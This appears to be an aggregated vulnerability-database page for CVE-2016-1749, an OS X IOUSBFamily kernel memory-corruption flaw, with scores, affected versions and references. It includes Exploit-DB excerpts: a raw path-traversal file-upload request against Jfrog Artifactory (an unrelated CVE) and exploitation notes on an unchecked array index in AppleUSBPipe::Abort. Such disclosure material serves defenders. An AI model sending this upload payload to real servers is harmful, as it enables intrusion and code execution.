CVE-2016-1749
Published: 2016-03-24
CVE-2016-1749: IOUSBFamily in Apple OS X before 10.11.4 allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption)…
Priority: P344 · high · 7.8 (CVSS 3.0)
Vector: AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 4.06% (89.4th percentile)
IOUSBFamily in Apple OS X before 10.11.4 allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | mac_os_x | <= 10.11.3 | — |
| apple | os_x_el_capitan_v10.11.4_and_security_update_2016-002 | — | — |
CVSS provenance
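| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 7.8 | HIGH | CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 9.3 | CRITICAL | AV:N/AC:M/Au:N/C:C/I:C/A:C |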
GHSA
GHSA-65cj-hv6f-f8rv: IOUSBFamily in Apple OS X before 10
ghsa_unreviewed·2022-05-17
CVE-2016-1749 [HIGH] CWE-119 GHSA-65cj-hv6f-f8rv: IOUSBFamily in Apple OS X before 10
IOUSBFamily in Apple OS X before 10.11.4 allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.
Apple
CVE-2016-1749: OS X El Capitan v10.11.4 and Security Update 2016-002
vendor_apple·CVSS 7.8
CVE-2016-1749 [HIGH] CVE-2016-1749: OS X El Capitan v10.11.4 and Security Update 2016-002
Apple Security Update: About the security content of OS X El Capitan v10.11.4 and Security Update 2016-002
Product: OS X El Capitan v10.11.4 and Security Update 2016-002
CVE: CVE-2016-1749
Component: CVE-ID
No detection rules found.
Exploit-DB
Jfrog Artifactory < 4.16 - Arbitrary File Upload / Remote Command Execution
exploitdb·2018-04-26·CVSS 9.8
CVE-2016-10036 [CRITICAL] Jfrog Artifactory < 4.16 - Arbitrary File Upload / Remote Command Execution
Jfrog Artifactory alert(/Vulnerable/)" within the file app.html :
POST /artifactory/ui/artifact/upload HTTP/1.1
Host: [removed]
User-Agent: [removed]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 1749
Content-Type: multipart/form-data; boundary=---------------------------6085305491255810029929874687
Connection: close
-----------------------------6085305491255810029929874687
Content-Disposition: form-data; name="file"; filename="../../../tomcat/webapps/artifactory/webapp/app.html"
Content-Type: application/zip
alert(/Vulnerable/)
-----------------------------6085305491255810029929874687--
(It is also possible to exploit this vulnerability to create JSP files within
Exploit-DB
Apple Mac OSX Kernel - Code Execution Due to Lack of Bounds Checking in AppleUSBPipe::Abort
exploitdb·2016-03-23
CVE-2016-1749 Apple Mac OSX Kernel - Code Execution Due to Lack of Bounds Checking in AppleUSBPipe::Abort
Apple Mac OSX Kernel - Code Execution Due to Lack of Bounds Checking in AppleUSBPipe::Abort
---
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=728
External Method 36 of IOUSBInterfaceUserClient is _AbortStreamPipe.
It takes two scalar inputs and uses the second one as an array index to read a pointer
to a C++ object without checking the bounds then calls a virtual method on it.
Furthermore there's no check that the array pointer is non-null; if it is then we can get a
controlled offset-from-zero read; since our controlled dword will be multiplied by 8 to
index the array this means we can easily get the kernel to dereference a controllable
userspace address.
In this case a value of 0xf0f0f0f0 leads to the kernel reading an IOKit object pointer from
0x787878780. T
No writeups or analysis indexed.
References:
http://lists.apple.com/archives/security-announce/2016/Mar/msg00004.html
http://www.securitytracker.com/id/1035363
http://www.zerodayinitiative.com/advisories/ZDI-16-206
https://support.apple.com/HT206167
https://www.exploit-db.com/exploits/39607/
Published: 2016-03-24